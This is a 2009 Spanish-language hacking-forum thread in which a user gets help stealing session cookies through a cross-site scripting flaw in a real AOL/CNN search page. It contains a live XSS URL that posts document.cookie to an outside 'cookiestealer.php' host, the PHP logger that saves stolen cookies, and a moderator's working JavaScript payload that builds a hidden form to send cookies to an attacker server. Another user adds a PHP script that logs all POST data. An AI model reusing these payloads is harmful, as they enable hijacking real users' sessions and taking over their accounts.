Necesito ayuda con xss. La cookie esta muy larga.

Tema destacado: Últimos eventos sobre seguridad/inseguridad

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

Necesito ayuda con xss. La cookie esta muy larga.

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Necesito ayuda con xss. La cookie esta muy larga. (Leído 1,763 veces)

cool0403

Desconectado

Mensajes: 4

Necesito ayuda con xss. La cookie esta muy larga.

« en: 28 Noviembre 2009, 18:30 »

okay tengo un problema pasando la cookie a mi cookiestealer.php.

El problema que tengo es que no puedo pasar todo el contenido de la cookie, porque la cookie tiene mas de 255 characters y cuando la paso con GET mi cookiestealer.php no recive toda la cookie.

Hay una manera de guardar la cookie en partes con nombres, osea acceder la cookie por sección embes de todo junto.porque no puedo poner todo el contenido de la cookie con un GET command en la url porque hay un limite de 255 characters en la url.


	En línea

jdc

Desconectado

Mensajes: 3.253

janito dos cuatro...

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #1 en: 28 Noviembre 2009, 18:34 »

Y sí lo pasas por post?


	En línea

Aplicaciones para Android

cool0403

Desconectado

Mensajes: 4

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #2 en: 28 Noviembre 2009, 18:42 »

okay ese es el link

Código:

http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.cookie.length%29%3C/script%3E&query=query1

si te fijas la cookie tiene 698 characters,no pasaria toda la cookie con un GET command. Como lo haria con un post, que no hay otra manera de pasar toda la cookie parte a parte.


	En línea

WHK

吴阿卡
Moderador

Desconectado

Mensajes: 4.113

The Hacktivism is not a crime

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #3 en: 28 Noviembre 2009, 18:58 »

Hola, puedes utilizar una petición post con xmlhttp desde javascript o insertando un nuevo .js al código desde el xss y manipulas a tu antojo el .js para que pueda enviarte la cookie ya sea en trocitos o serializada.

También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post.

Si no sabes que es una petición post te sugiero que leas un manual básico acerca de xss y código html para que puedas aprender como funciona un formulario web.

La otra opción sería que le preguntes directamente a la persona que descubrió el xss:
http://www.xssed.com/mirror/62113/

Si quieres aprender puedes leer estos tutos para que comienzes con lo básico:
http://foro.elhacker.net/nivel_web/diccionario_informatico_sobre_bugs_y_exploits_en_nivel_web_v10-t264007.0.html
http://foro.elhacker.net/desarrollo_web-b7.0/
http://en.wikipedia.org/wiki/POST_%28HTTP%29
http://www.subgurim.net/Articulos/ajax-y-javascript/54/ajax-a-pelo-xmlhttprequest.aspx
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_261109-t244090.0.html

Saludos.


	En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!

cool0403

Desconectado

Mensajes: 4

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #4 en: 28 Noviembre 2009, 19:01 »

Okay gracias despues regreso voy a escuchar y hacer lo que me dijo WHK


	En línea

WHK

吴阿卡
Moderador

Desconectado

Mensajes: 4.113

The Hacktivism is not a crime

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #5 en: 28 Noviembre 2009, 20:52 »

Genial!, si tienes alguna duda con alguna lectura nos avisas y vemos en que te podemos ayudar.


	En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!

cool0403

Desconectado

Mensajes: 4

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #6 en: 28 Noviembre 2009, 21:35 »

Okay primeramente gracias por tu ayuda en tu primer post.Los links no me ayudaron para decirte la verdad pero me ayudo lo que me dijiste de
"También puedes inyectar al DOM un formulario para enviar todo atraves de una sola petición post."

Eso fue lo que me ayudo mas.

Okay aqui esta mi nuevo link nadamas que ahora tengo otro problema , pero es mejor que antes

http://cnn.search.aol.com/aol/weboffers?invocationType=%22%3E%3Cscript%3Ealert%28document.forms

.elements[1].value=document.cookie%29;alert%28document.forms[0].action%20=%20%27http://gotcookie1.orgfree.com/cookiestealer.php%27%29;alert%28document.forms[0].submit%28%29%29%3C/script%3E&query=query1

si te fijas . hice lo que tu me dijiste , cambie 3 cosas.
El action, ha el php de mi cookiestealer.php
Puse la cookie en Query1
y la hice submit.
Pero cuando clickeo en link me dice 'undefined'

y ese es my cookiestealer.php
<?php
$cookie = urldecode($_POST['q']);
$fp = fopen("log.txt", "a");
fwrite($fp, "$cookie \n");
fclose($fp);
?>


	En línea

WHK

吴阿卡
Moderador

Desconectado

Mensajes: 4.113

The Hacktivism is not a crime

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #7 en: 29 Noviembre 2009, 08:16 »

Si quieres ahorrar código puedes inyectar esto en formato HTML:

Código:

Entonces trabajas sobre archivo de ‭‬‭‬javascript y vas reuniendo variables y vas creando inputs y te envías la petición:

xss.js

Código:

try{
  payload = '<form name="xss_form" id="xss_form" action="http://miweb.com/xss.php" method="post">';
  payload += '<input type="hidden" name="cookie" value="' + escape(document.cookie) + '" />';
  payload += '</form>';
  document.write(payload);
  document.xss_form.submit();
}catch(e){}

Ahora puedes unir todo en un solo archivo php donde si llega una petición post entonces procesa los datos y lo guarda y redirecciona a google y si no llega ninguna peticion post entonces que se muestre el contenido del ‭‬‭‬javascript, así puedes lanzar el xss con la url hacia tu php:

Código:

Ahora otra forma sería hacer un document.location hacia '#' + document.cookie y despues haces una segunda redirección hacia tu script y obtienes la cookie desde la referencia

Saludos.


« Última modificación: 29 Noviembre 2009, 08:20 por WHK »	En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!

shimpei

Desconectado

Mensajes: 51

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #8 en: 30 Noviembre 2009, 06:18 »

estimado WHK como seria un ejemplo de ese ultimo?


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

WHK

吴阿卡
Moderador

Desconectado

Mensajes: 4.113

The Hacktivism is not a crime

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #9 en: 30 Noviembre 2009, 06:28 »

ese ultimo era el ejemplo xD


	En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!

shimpei

Desconectado

Mensajes: 51

Re: Necesito ayuda con xss. La cookie esta muy larga.

« Respuesta #10 en: 30 Noviembre 2009, 06:51 »

es que me dejo liado esto "Ahora otra forma sería hacer un document.location hacia '#' + document.cookie y despues haces una segunda redirección hacia tu script y obtienes la cookie desde la referencia"

aca les dejo un codigo util

Código:

$handle = fopen("log.txt", "w");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;


	En línea

DSR! //"Con Amor o con Odio pero siempre con Violencia"
web http://www.SoporteDSR.ar.gd

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	* busco esta pelicula **NECESITO AYUDA Foro Libre	acciarini	1	354	17 Diciembre 2011, 15:37 por Last_
	Necesito ayuda con un serial bastante complejo, que esta desempacado con Telock Ingeniería Inversa	manakagruya	4	598	1 Febrero 2012, 19:14 por MCKSys Argentina
	[AYUDA]i want a cookie 4 Programación C/C++	daniyo	0	46	20 Mayo 2012, 20:28 por daniyo